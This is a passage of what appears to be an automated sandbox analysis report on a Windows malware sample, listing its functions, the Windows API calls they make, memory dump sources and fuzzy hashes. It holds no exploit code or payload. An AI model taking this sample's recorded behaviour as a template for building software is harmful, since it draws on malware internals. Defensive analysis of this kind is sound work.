                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$EnableShow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1136574915-0
                                                                                                                        • Opcode ID: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                                                                                                                        • Instruction ID: a6cb0e5ea3b461fc76251f348ffd86be0a73501dc920cd99368f231d5504fafc
                                                                                                                        • Opcode Fuzzy Hash: b342668e68410e2d968fedd3eb79c8682b657b25800b9077b5ecd2124e99ac37
                                                                                                                        • Instruction Fuzzy Hash: F2E09A36A082049FE705EBA8AE484AEB3B0EB40325B200A7FE001F11C0CBB94C00866C
                                                                                                                        Function 00406915 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(?,00000020,?,0040360C,0000000C,?,?,?,?,?,?,?,?), ref: 00406927
                                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406942
                                                                                                                          • Part of subcall function 004068A5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                                                          • Part of subcall function 004068A5: wsprintfW.USER32 ref: 004068F7
                                                                                                                          • Part of subcall function 004068A5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2547128583-0
                                                                                                                        • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                        • Instruction ID: 5852e889d14e736f2df1098d3b7202b06462132acdc852f75f804bf3a6ff6809
                                                                                                                        • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                                                                                                        • Instruction Fuzzy Hash: FCE08673604310EBD61056755D04D2773A8AF95A50302483EFD46F2144D738DC32A66A
                                                                                                                        Function 00406011 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe,80000000,00000003), ref: 00406015
                                                                                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00406037
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 415043291-0
                                                                                                                        • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                        • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                                                                                                        • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                                                                                                        • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                                                                                                        Function 00405ACF Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,004034EF,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6,?,00000008,0000000A,0000000C), ref: 00405AD5
                                                                                                                        • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405AE3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1375471231-0
                                                                                                                        • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                        • Instruction ID: c141ebc68f4164d0a3663fa1b1ea49181af819f28e12deb644bc081b11005b13
                                                                                                                        • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                                                                        • Instruction Fuzzy Hash: 5DC08C30300A02DACF000B218F087073950AB00380F19483AA582E00A0CA308044CD2D
                                                                                                                        Function 00402896 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028B4
                                                                                                                          • Part of subcall function 00406468: wsprintfW.USER32 ref: 00406475
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointerwsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 327478801-0
                                                                                                                        • Opcode ID: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                                                                                        • Instruction ID: 3ecce12b6213660a705480fd24811c4b14f3d13bc743ad81d22bf59cde18bc7d
                                                                                                                        • Opcode Fuzzy Hash: c408762c6ae6a09676534d13277c6868af0c4062816ce02b100207dfef7a20c8
                                                                                                                        • Instruction Fuzzy Hash: 8DE06D71904208AFDB01ABA5AA498AEB379EB44344B10483FF101B10C0CA794C119A2D
                                                                                                                        Function 0040173A Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040174E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: PathSearch
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2203818243-0
                                                                                                                        • Opcode ID: 96c3c64599610033e1741a12b780745032a27335a1d6010ee521e40a3137f023
                                                                                                                        • Instruction ID: 71d187b5cc8d7de3a3c01a98f906eab562aacc0ad357dac51c0352885440fd59
                                                                                                                        • Opcode Fuzzy Hash: 96c3c64599610033e1741a12b780745032a27335a1d6010ee521e40a3137f023
                                                                                                                        • Instruction Fuzzy Hash: D9E04871204104ABE700DB64DD48EAA7778DB5035CF20453AE511A60D1E6B55905971D
                                                                                                                        Function 004060C3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                        • Instruction ID: de33e43015841e90b47a85578f5cc3acb86098a1fa118a6604a55d69533944a7
                                                                                                                        • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                                                                                        • Instruction Fuzzy Hash: 41E08C3224022AABCF109E508D00EEB3B6CEB003A0F018433FD26E2090D630E83197A4
                                                                                                                        Function 00406094 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034B1,00000000,00000000,00403308,000000FF,00000004,00000000,00000000,00000000), ref: 004060A8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2738559852-0
                                                                                                                        • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                        • Instruction ID: fd87eb1c4e4509ee71b5dc1f82ee1534a3bbef2287d177a98c1a1ef8e7fccbc0
                                                                                                                        • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                                                                                        • Instruction Fuzzy Hash: 11E08C3229021AEBDF119E50CC00AEB7BACEB043A0F018436FD22E3180D671E83187A9
                                                                                                                        Function 70592A7F Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VirtualProtect.KERNELBASE(7059505C,00000004,00000040,7059504C), ref: 70592A9D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ProtectVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 544645111-0
                                                                                                                        • Opcode ID: d30b9a3c16bb8d7877d4fd8f0e9ed5d9b3b38e2fa94c7baa623fce4a30c0ef67
                                                                                                                        • Instruction ID: 2c19a8e1f6d0b44433a35fe052dd74ce0a3cb8742105c6d731d9a36eab5080ea
                                                                                                                        • Opcode Fuzzy Hash: d30b9a3c16bb8d7877d4fd8f0e9ed5d9b3b38e2fa94c7baa623fce4a30c0ef67
                                                                                                                        • Instruction Fuzzy Hash: 4AF0A5B2535280DEC351CF2B8C4D7093FE0BB29304B26462BE188EA260E3744469DB95
                                                                                                                        Function 0040638E Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000000,?,0040641C,?,?,?,?,Call,?,00000000), ref: 004063B2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Open
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 71445658-0
                                                                                                                        • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                        • Instruction ID: 99177681843bc7d8b33aa39255ce29306f0e35401c43de39655aaedf71f86506
                                                                                                                        • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                                                                                        • Instruction Fuzzy Hash: DAD0173204020DBBDF119E90ED01FAB3B6DAB08350F014826FE06A40A0D776D534ABA8
                                                                                                                        Function 004015A8 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015B3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: 58434a7e7cdfb0d0f19199f5504f69f984a7681d240ae9cdceb23cdc370956f4
                                                                                                                        • Instruction ID: f79479eb79e616cc8aec51f56aa6edc525cb8d4391243906608abe1f76efb7bb
                                                                                                                        • Opcode Fuzzy Hash: 58434a7e7cdfb0d0f19199f5504f69f984a7681d240ae9cdceb23cdc370956f4
                                                                                                                        • Instruction Fuzzy Hash: 3DD05B72B08204DBDB01DBE8EA48A9E73B09B50328F20893BD111F11D0D6B9C945A75D
                                                                                                                        Function 004044A0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetDlgItemTextW.USER32(?,?,00000000), ref: 004044BA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemText
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3367045223-0
                                                                                                                        • Opcode ID: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                                                        • Instruction ID: ae2ead1ac10e0797e36fe1c05e7dcabccdaa2022beaf041c85de5a3ae6598913
                                                                                                                        • Opcode Fuzzy Hash: 9f5f9317995870dd68fcf34551989b3f9c33a874f6e62bdf9e4bbf2fb329bfe5
                                                                                                                        • Instruction Fuzzy Hash: C9C08C71008200BFD241BB08CC02F1FB3AAEF90325F00C42EB15CA10D2C63595308A26
                                                                                                                        Function 004044EC Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                        • Instruction ID: 5c877ab33ec7e7ab303c696e8a99d36134f19a60efc45403e0926baa73fdbb46
                                                                                                                        • Opcode Fuzzy Hash: c543a5305144ba01004fe0d35289a86565b01ad173ebec7ef44f324a9b2ac024
                                                                                                                        • Instruction Fuzzy Hash: 9AC09BF57413017BDA209F509D45F1777585790710F15453D7350F50E0CBB4E450D61D
                                                                                                                        Function 004044D5 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000028,?,?,00404300), ref: 004044E3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                        • Instruction ID: a1e91a2b22b377b77c28deac9acb262fc7b3ebada01c3a2f9bc193e64980b6bc
                                                                                                                        • Opcode Fuzzy Hash: 0b5dc737e690c2697fce459c5807109f7a0ee7b6821d5e504b87bae23edcb368
                                                                                                                        • Instruction Fuzzy Hash: E9B09236690A40AADA215B00DE09F867B62A7A8701F008438B240640B0CAB204A1DB08
                                                                                                                        Function 004034B4 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
